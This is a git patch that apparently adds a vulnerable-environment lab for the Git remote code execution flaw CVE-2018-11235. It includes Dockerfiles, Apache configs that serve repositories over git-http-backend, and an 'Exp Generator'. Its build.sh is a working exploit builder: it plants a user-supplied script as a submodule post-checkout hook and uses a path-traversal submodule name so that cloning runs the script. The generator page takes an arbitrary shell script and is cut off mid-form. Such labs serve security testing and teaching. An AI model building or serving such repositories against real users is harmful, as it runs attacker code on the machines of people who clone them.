From c4b3dcc7f47950b6e6efa9bc9896f98a0c55100a Mon Sep 17 00:00:00 2001
From: Medicean <Medici.Yan@Gmail.com>
Date: Fri, 1 Jun 2018 16:24:53 +0800
Subject: [PATCH] =?UTF-8?q?(Add=20Vul:=20Git)=20Git=E8=BF=9C=E7=A8=8B?=
 =?UTF-8?q?=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E=20CVE-20?=
 =?UTF-8?q?18-11235?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md                        |   4 +
 g/git/1/Dockerfile               |  17 +++
 g/git/1/README.md                |   1 +
 g/git/1/exp/Dockerfile           |  26 ++++
 g/git/1/exp/src/000-default.conf |  16 +++
 g/git/1/exp/src/apache2.conf     | 228 +++++++++++++++++++++++++++++++
 g/git/1/exp/src/base.tar.gz      | Bin 0 -> 6562 bytes
 g/git/1/exp/src/build.sh         |  29 ++++
 g/git/1/exp/src/index.php        |  40 ++++++
 g/git/1/exp/src/start.sh         |   3 +
 g/git/1/src/apache2.conf         | 228 +++++++++++++++++++++++++++++++
 g/git/1/src/index.php            |  23 ++++
 g/git/1/src/start.sh             |   3 +
 g/git/README.md                  |   4 +
 14 files changed, 622 insertions(+)
 create mode 100644 g/git/1/Dockerfile
 create mode 100644 g/git/1/README.md
 create mode 100644 g/git/1/exp/Dockerfile
 create mode 100644 g/git/1/exp/src/000-default.conf
 create mode 100644 g/git/1/exp/src/apache2.conf
 create mode 100644 g/git/1/exp/src/base.tar.gz
 create mode 100644 g/git/1/exp/src/build.sh
 create mode 100644 g/git/1/exp/src/index.php
 create mode 100644 g/git/1/exp/src/start.sh
 create mode 100644 g/git/1/src/apache2.conf
 create mode 100644 g/git/1/src/index.php
 create mode 100644 g/git/1/src/start.sh
 create mode 100644 g/git/README.md

diff --git a/README.md b/README.md
index 0d5bb7c..585e56b 100644
--- a/README.md
+++ b/README.md
@@ -77,6 +77,10 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 
 * [FFmpeg](./i/ffmpeg/)
 
+### [G](./g/)<div id="g"></div>
+
+* [Git](./g/git/)
+
 ### [I](./i/)<div id="i"></div>
 
 * [ImageMagick](./i/imagemagick/)
diff --git a/g/git/1/Dockerfile b/g/git/1/Dockerfile
new file mode 100644
index 0000000..22fd79c
--- /dev/null
+++ b/g/git/1/Dockerfile
@@ -0,0 +1,17 @@
+FROM medicean/vulapps:base_lamp
+
+RUN set -x \
+    && apt-get update \
+    && apt-get install -y git=1:1.9.1-1 \
+    && rm -rf /var/www/html/* \
+    && mkdir -p /var/www/html/repos
+
+COPY src/apache2.conf /etc/apache2/apache2.conf
+COPY src/index.php /var/www/html/index.php
+COPY src/start.sh /start.sh
+
+RUN chmod +x /start.sh \
+    && chown -R www-data:www-data /var/www/html
+
+EXPOSE 80
+CMD ["/start.sh"]
diff --git a/g/git/1/README.md b/g/git/1/README.md
new file mode 100644
index 0000000..e2f0103
--- /dev/null
+++ b/g/git/1/README.md
@@ -0,0 +1 @@
+## Git远程代码执行漏洞(CVE-2018-11235)
diff --git a/g/git/1/exp/Dockerfile b/g/git/1/exp/Dockerfile
new file mode 100644
index 0000000..eee1c58
--- /dev/null
+++ b/g/git/1/exp/Dockerfile
@@ -0,0 +1,26 @@
+FROM medicean/vulapps:base_lamp
+
+COPY src/base.tar.gz /tmp/base.tar.gz
+
+RUN set -x \
+    && a2enmod cgi alias env rewrite \
+    && apt-get update \
+    && apt-get install -y git=1:1.9.1-1 git-core \
+    && rm -rf /var/www/html/* \
+    && mkdir -p /var/www/html/repos \
+    && tar -zxvf /tmp/base.tar.gz -C /var/www/html/repos/ \
+    && apt-get remove -y mysql-server mysql-client \
+    && apt-get clean \
+    && rm -rf /var/lib/apt/lists/*
+
+COPY src/apache2.conf /etc/apache2/apache2.conf
+COPY src/000-default.conf /etc/apache2/sites-available/000-default.conf
+COPY src/index.php /var/www/html/index.php
+COPY src/build.sh /var/www/html/build.sh
+COPY src/start.sh /start.sh
+
+RUN chmod +x /start.sh \
+    && chown -R www-data:www-data /var/www/html
+
+EXPOSE 80
+CMD ["/start.sh"]
diff --git a/g/git/1/exp/src/000-default.conf b/g/git/1/exp/src/000-default.conf
new file mode 100644
index 0000000..1565af0
--- /dev/null
+++ b/g/git/1/exp/src/000-default.conf
@@ -0,0 +1,16 @@
+<VirtualHost *:80>
+    SetEnv GIT_PROJECT_ROOT /var/www/html/repos    
+    SetEnv GIT_HTTP_EXPORT_ALL
+    ScriptAlias /git/ /usr/lib/git-core/git-http-backend/ 
+
+DocumentRoot /var/www/html
+
+<Directory "/usr/lib/git-core">
+    Options +ExecCgi -MultiViews +SymLinksIfOwnerMatch
+    AllowOverride none
+    Order allow,deny
+    Allow from all
+    Require all granted
+</Directory>
+
+</VirtualHost>
diff --git a/g/git/1/exp/src/apache2.conf b/g/git/1/exp/src/apache2.conf
new file mode 100644
index 0000000..1576d89
--- /dev/null
+++ b/g/git/1/exp/src/apache2.conf
@@ -0,0 +1,228 @@
+# This is the main Apache server configuration file.  It contains the
+# configuration directives that give the server its instructions.
+# See http://httpd.apache.org/docs/2.4/ for detailed information about
+# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
+# hints.
+#
+#
+# Summary of how the Apache 2 configuration works in Debian:
+# The Apache 2 web server configuration in Debian is quite different to
+# upstream's suggested way to configure the web server. This is because Debian's
+# default Apache2 installation attempts to make adding and removing modules,
+# virtual hosts, and extra configuration directives as flexible as possible, in
+# order to make automating the changes and administering the server as easy as
+# possible.
+
+# It is split into several files forming the configuration hierarchy outlined
+# below, all located in the /etc/apache2/ directory:
+#
+#	/etc/apache2/
+#	|-- apache2.conf
+#	|	`--  ports.conf
+#	|-- mods-enabled
+#	|	|-- *.load
+#	|	`-- *.conf
+#	|-- conf-enabled
+#	|	`-- *.conf
+# 	`-- sites-enabled
+#	 	`-- *.conf
+#
+#
+# * apache2.conf is the main configuration file (this file). It puts the pieces
+#   together by including all remaining configuration files when starting up the
+#   web server.
+#
+# * ports.conf is always included from the main configuration file. It is
+#   supposed to determine listening ports for incoming connections which can be
+#   customized anytime.
+#
+# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
+#   directories contain particular configuration snippets which manage modules,
+#   global configuration fragments, or virtual host configurations,
+#   respectively.
+#
+#   They are activated by symlinking available configuration files from their
+#   respective *-available/ counterparts. These should be managed by using our
+#   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
+#   their respective man pages for detailed information.
+#
+# * The binary is called apache2. Due to the use of environment variables, in
+#   the default configuration, apache2 needs to be started/stopped with
+#   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
+#   work with the default configuration.
+
+
+# Global configuration
+#
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# NOTE!  If you intend to place this on an NFS (or otherwise network)
+# mounted filesystem then please read the Mutex documentation (available
+# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
+# you will save yourself a lot of trouble.
+#
+# Do NOT add a slash at the end of the directory path.
+#
+#ServerRoot "/etc/apache2"
+
+#
+# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
+#
+Mutex file:${APACHE_LOCK_DIR} default
+
+#
+# PidFile: The file in which the server should record its process
+# identification number when it starts.
+# This needs to be set in /etc/apache2/envvars
+#
+PidFile ${APACHE_PID_FILE}
+
+#
+# Timeout: The number of seconds before receives and sends time out.
+#
+Timeout 300
+
+#
+# KeepAlive: Whether or not to allow persistent connections (more than
+# one request per connection). Set to "Off" to deactivate.
+#
+KeepAlive On
+
+#
+# MaxKeepAliveRequests: The maximum number of requests to allow
+# during a persistent connection. Set to 0 to allow an unlimited amount.
+# We recommend you leave this number high, for maximum performance.
+#
+MaxKeepAliveRequests 100
+
+#
+# KeepAliveTimeout: Number of seconds to wait for the next request from the
+# same client on the same connection.
+#
+KeepAliveTimeout 5
+
+
+# These need to be set in /etc/apache2/envvars
+User ${APACHE_RUN_USER}
+Group ${APACHE_RUN_GROUP}
+
+#
+# HostnameLookups: Log the names of clients or just their IP addresses
+# e.g., www.apache.org (on) or 204.62.129.132 (off).
+# The default is off because it'd be overall better for the net if people
+# had to knowingly turn this feature on, since enabling it means that
+# each client request will result in AT LEAST one lookup request to the
+# nameserver.
+#
+HostnameLookups Off
+
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a <VirtualHost>
+# container, error messages relating to that virtual host will be
+# logged here.  If you *do* define an error logfile for a <VirtualHost>
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog ${APACHE_LOG_DIR}/error.log
+
+#
+# LogLevel: Control the severity of messages logged to the error_log.
+# Available values: trace8, ..., trace1, debug, info, notice, warn,
+# error, crit, alert, emerg.
+# It is also possible to configure the log level for particular modules, e.g.
+# "LogLevel info ssl:warn"
+#
+LogLevel warn
+
+# Include module configuration:
+IncludeOptional mods-enabled/*.load
+IncludeOptional mods-enabled/*.conf
+
+# Include list of ports to listen on
+Include ports.conf
+
+
+# Sets the default security model of the Apache2 HTTPD server. It does
+# not allow access to the root filesystem outside of /usr/share and /var/www.
+# The former is used by web applications packaged in Debian,
+# the latter may be used for local directories served by the web server. If
+# your system is serving content from a sub-directory in /srv you must allow
+# access here, or in any related virtual host.
+<Directory />
+	Options FollowSymLinks
+	AllowOverride None
+	Require all denied
+</Directory>
+
+<Directory /usr/share>
+	AllowOverride None
+	Require all granted
+</Directory>
+
+<Directory /var/www/>
+	Options Indexes FollowSymLinks
+	AllowOverride None
+	Require all granted
+</Directory>
+
+#<Directory /srv/>
+#	Options Indexes FollowSymLinks
+#	AllowOverride None
+#	Require all granted
+#</Directory>
+<Directory "/var/www/html/repos">
+    Options Indexes FollowSymLinks
+    <FilesMatch "\.(?i:php|php3|php4|php5)$">
+	SetHandler application/x-httpd-php-source
+    	Order Deny,Allow
+    	Allow from all
+    </FilesMatch>
+</Directory>
+
+
+
+# AccessFileName: The name of the file to look for in each directory
+# for additional configuration directives.  See also the AllowOverride
+# directive.
+#
+AccessFileName .htaccess
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+<FilesMatch "^\.ht">
+	Require all denied
+</FilesMatch>
+
+
+#
+# The following directives define some format nicknames for use with
+# a CustomLog directive.
+#
+# These deviate from the Common Log Format definitions in that they use %O
+# (the actual bytes sent including headers) instead of %b (the size of the
+# requested file), because the latter makes it impossible to detect partial
+# requests.
+#
+# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
+# Use mod_remoteip instead.
+#
+LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
+LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
+LogFormat "%h %l %u %t \"%r\" %>s %O" common
+LogFormat "%{Referer}i -> %U" referer
+LogFormat "%{User-agent}i" agent
+
+# Include of directories ignores editors' and dpkg's backup files,
+# see README.Debian for details.
+
+# Include generic snippets of statements
+IncludeOptional conf-enabled/*.conf
+
+# Include the virtual host configurations:
+IncludeOptional sites-enabled/*.conf
+
+# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
diff --git a/g/git/1/exp/src/base.tar.gz b/g/git/1/exp/src/base.tar.gz
new file mode 100644
index 0000000000000000000000000000000000000000..476493596128a528122d89ebf3187fea1e78cbd9
GIT binary patch
literal 6562
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
U!6+C7qhRm>0AX$K!T_KE0I5x`!T<mO

literal 0
HcmV?d00001

diff --git a/g/git/1/exp/src/build.sh b/g/git/1/exp/src/build.sh
new file mode 100644
index 0000000..5078eac
--- /dev/null
+++ b/g/git/1/exp/src/build.sh
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+set -e
+reponame=$1
+base_host=$2
+
+base_dir="/var/www/html/repos"
+repo_dir="$base_dir/${reponame}"
+repo_submodule="http://${base_host}/git/base.git"
+
+cd $base_dir
+
+git init "$repo_dir"
+cd "$repo_dir"
+git config user.email "your@example.com"
+git config user.name "YourName"
+git submodule add "$repo_submodule" evil
+mkdir modules
+cp -r .git/modules/evil modules
+
+chmod +x /tmp/evil.sh
+cp /tmp/evil.sh modules/evil/hooks/post-checkout
+git config -f .gitmodules submodule.evil.update checkout
+git config -f .gitmodules --rename-section submodule.evil submodule.../../modules/evil
+git add modules
+git submodule add "$repo_submodule"
+git add base
+git commit -am CVE-2018-11235
+exit 0
\ No newline at end of file
diff --git a/g/git/1/exp/src/index.php b/g/git/1/exp/src/index.php
new file mode 100644
index 0000000..94196e5
--- /dev/null
+++ b/g/git/1/exp/src/index.php
@@ -0,0 +1,40 @@
+<html>
+ <head>
+  <meta charset="utf-8">
+  <title>VulApps CVE-2018-11235 Exp Generator</title>
+ </head>
+ <body>
+    <p>VulApps CVE-2018-11235 Exp Generator</p>
+    <form method="post">
+        <label for="command">shell script:</label><br>
